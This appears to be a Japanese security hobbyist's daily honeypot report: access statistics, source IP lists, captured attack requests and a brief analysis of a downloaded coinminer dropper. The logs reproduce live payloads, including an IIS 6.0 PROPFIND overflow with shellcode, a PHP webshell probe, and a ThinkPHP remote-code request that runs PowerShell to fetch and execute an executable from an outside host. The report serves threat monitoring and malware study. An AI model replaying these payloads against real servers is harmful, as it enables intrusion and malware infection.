HONEY POTの簡易解析3日目

■2019-04-03のアクセス数は555件でした。

■送信元IPアドレスの数は 52件です。

■メソッドの種別は以下です。

GET・・504件
PUT・・0件
POST・・49件
HEAD・・1件
CONNECT・・0件
PROFFIND・・1件
その他・・0件

■送信元ipアドレスの一覧と件数は以下となります。

182.61.171.45・・・2件

61.160.236.77・・・16件

50.249.177.14・・・1件

180.247.183.11・・・1件

88.247.206.25・・・1件

71.6.232.4・・・1件

143.202.188.3・・・1件

85.99.106.24・・・1件

188.163.16.57・・・1件

45.242.220.21・・・1件

119.29.85.12・・・1件

88.247.83.15・・・1件

78.189.117.12・・・1件

94.141.169.68・・・1件

79.174.24.72・・・1件

4.34.201.34・・・280件

66.102.6.49・・・1件

103.80.117.11・・・1件

95.170.113.18・・・1件

189.162.250.19・・・1件

112.66.184.231・・・3件

186.192.16.18・・・1件

184.105.139.67・・・1件

181.224.255.50・・・1件

103.113.107.4・・・1件

95.133.53.21・・・1件

196.52.43.57・・・1件

176.103.74.11・・・1件

172.104.108.10・・・1件

83.148.239.21・・・1件

193.240.245.22・・・7件

92.118.161.53・・・1件

88.250.159.23・・・1件

107.170.237.22・・・1件

61.219.11.15・・・1件

179.213.132.11・・・1件

124.158.168.19・・・1件

194.114.129.21・・・1件

85.101.11.21・・・1件

93.51.240.14・・・1件

13.232.7.103・・・200件

193.107.228.22・・・1件

223.105.4.25・・・2件

162.243.145.24・・・1件

103.90.205.30・・・1件

187.74.193.25・・・1件

198.108.66.24・・・1件

216.245.197.25・・・1件

92.118.160.41・・・1件

5.160.128.71・・・1件

46.183.122.12・・・1件

78.163.225.16・・・1件

気になるlog

12件目。IIS6.0の脆弱性をねらった攻撃。

[2019-04-03 02:56:22+0900] 13.232.7.103 localhost:80 "PROPFIND / HTTP/1.1" 200 1022 
PROPFIND / HTTP/1.1
Host: localhost
Connection: Close
Content-Length: 0
If: =?utf-8?b?PGh0dHA6Ly9sb2NhbGhvc3QvYWFhYWFhYcOmwr3CqMOnwqHCo8Onwp3CocOnwoTCs8OmwqTCtsOkwp3CssOnwqjCucOkwq3Ct8Okwr3CsMOnwpXCk8OnwqnCj8OkwqHCqMOlwpnCo8OmwrXClMOmwqE=?=

㥓偬啧杣㍤䘰硅
楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍å…
¡å¡¢ä³å‰ã™°ç•„桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷ä…
„㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒ä…
æ™á€æ ƒä ´æ”±æ½ƒæ¹¦ç‘ä¬á€æ ƒåƒæ©ç’㌰塦䉌灋捆å…
³ç¥ç©ä©¬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈æ…
µä½ƒæ½§æ­¯ä¡…
㙆杵䐳㡱坥婢吵噡楒橓å…
—㡎奈捕䥱䍤摲㑨䝘ç…
¹ã«æ­•æµˆåç©†ã‘±æ½”瑃奖潯獁㑗æ…
¨ç©²ã…
䵉坎呈䰸㙺㕲扦湃䡭㕈æ…
·äµšæ…
´ä„³ä¥å‰²æµ©ã™±ä¹¤æ¸¹æ“æ­¤å…
†ä¼°ç¡¯ç‰“材䕓穣焹体䑖漶獹桷穖æ…
Šã¥…
㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ã…
‚塥奁ç…
ã€¶å·ä‘—卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ã…
¶æ¹¯â“£æ á‘ æ ƒÌ€ç¿¾ï¿¿ï¿¿á€æ ƒÑ®æ ƒç…
®ç‘°á´æ ƒâ§§æ éŽ‘栀㤱普䥕げ呫癫牊祡ᐜ栃清
栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lk8sYkPkPypC0CY7uNQfr1TdKNrP0TKPRlLDKaBMDtKqbkxjoh70JNFP1yoP17PDlMls1QlYrnLmP7QXOlMZaI7K2hp22Nw4KqBjpBk12oLKQJ02kq03HE5WPQdOZm18PB0tKMxlXbk0XO0m1j3zCml0IrkLt2kiqxVnQYo01upvLva6ojmyqfgLxyPd5Xt9sQmHxoKqmLdSExbnxBk1Ho49qXSC6rkjlpK2kb8mLja8SDKjdDKKQ6pu90DmTNDaKqKOq1IPZr19ogpOhOo0ZtKzrXksVomqXPnc5qdm0ph1g2IPn0i2iJFR40hPLsGKvIwIoz5P1ioNwaGnw0WofRHnZofSIuWioJ5XkOpQKlqy921nqPjkSoanqrJPPr3r0Ph27ayCoev9oYEXk0OqImaFrNrBHkPp2aPtDNrNrB2r10Rb0S8hknunNoKkOZ5E96faZjp1KRHaplsipKPQygprJm4R0BJkoNvrHQenfeNTFIoiE019oogogNw27QF2HNMjfJxsKkOIEbeupqeMVNkZordu3kPM09pHkXQwyVDYpKPKPK8fLyoKOyonOpibMpa1W2Ed3NO1Qc2RCnONdpLnN0pS82PkPXkRKMay0Oo20BJm20jm2B01ZYrpjM20Wc88ZYfYJpO9o6u63MawP2FfXkTm3O9i4r4BmnlO4m8ma90vTLC2021ofc8LRV62iiRYoYEReEpqdLmNxu5EprTJvqZm0OdR0bmoTo4jl0Pb3bHLm1GFN1Kiovuu3JL9tHkXNpSc8FfRvqwnryoWeRJYpqGbHlq2kBOqwiovuaZkPBHXpee3rqFIo9EXhdPIoyo9oMsmjnOnOnrS5RC1ic3RLbE0rloloBS2VOsph2O2SsDlns51hPeIphhIbKNioKOp109OBLnmaP4mdlnP105P0nNNQoHLxkPAA>

13.232.7.103からの200件はphpのwebshell設置の調査だった。

postで以下のような文字列が含まれていた。webshellに関しての調査でdie()関数を実行している。

[2019-04-03 08:00:19+0900] 13.232.7.103 ほげ:80 "POST /xx.php HTTP/1.1" 200 False 
POST /xx.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Host: ほげ
Content-Length: 21
Connection: Keep-Alive
Cache-Control: no-cache

axa=die(@md5(M4rch));

248件目。遂にhuntinglog第一号となるアクセスが。あとで解析しよう。

[2019-04-03 10:07:04+0900] 112.66.184.231 ほげ:8080 "GET /public/index.php?
GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se[/]download.exe','C:/Windows/temp/jamabvipleovhlf20037.exe');start%20C:/Windows/temp/jamabvipleovhlf20037.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ:8080/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se[/]download.exe','C:/Windows/temp/jamabvipleovhlf20037.exe');start C:/Windows/temp/jamabvipleovhlf20037.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 133.167.108.152:8080

4.34.201.34の280件はパスワードリスト攻撃だった。

248件目の解析(download.exe)

表層解析

virustotal 52/66

d233335ee3810e1df0bcc768c283a122b2fbf7c322205098ccef1627be9b4e5d

Coinminer.Win32.MALXMR.TIAOODBVとか参考になりそう、あとはダウンローダー系が目立つ。

UPXでパック、外部通信するライブラリ、C++、

まぁダウンローダーだろうな。

初めてFlARE-VMで動かしてみる・・ノイズ多いなぁ

ファイルは以下

%LocalAppData%\Local\Temp\wercplshost.exe (ダウンロード)

%LocalAppData%\Temp\nmbsawer.exe (多分ドロップ)

NW通信は以下

[Full request URI: http://fid.hognoob.se/wercplshost.exe]

q1a.hognoob.se

%LocalAppData%\Local\Temp\wercplshost.exe

生成されたファイルをみると、以下の文字列

C:\Users\Andy\Documents\Visual Studio 2010\Projects\HServer2_OpenSSLFork\Release\FakeServerMiniProgram.pdb

実行すると・・

なるほど。オリジナルを取ってくる。

3.9MBあった!コインマイナーくさい

sha256,9AC977087C08FACE38D8993DB5CC26048F68D412243216887A61130D95150988

virustotal 53/67

mimikatzとか出てる。

で、また、UPX。(flara-VMにUPXがみつからない。)

unpackしてみると.dataが5MBも!みてみると、まるわかりのドロッパーだった。

こいつがnmbsawer.exeになるんだろうな。

というか、丸見えです。

挑発してUPXにしているのではなく、本当に難読化したかったつもりだったんだろうか、圧縮したかっただけなのか・・

よし、解析は辞めようw

おそらくコインマイナーを頑張ってばらまこうとしているんじゃないかな?

あとはsandboxでいいや。

結果↓ コインマイナーのタグついてるね。nmbsawer.exeが出てないのが気になる。。

https://www.hybrid-analysis.com/sample/9ac977087c08face38d8993db5cc26048f68d412243216887a61130d95150988/5ca6d573038838759f294668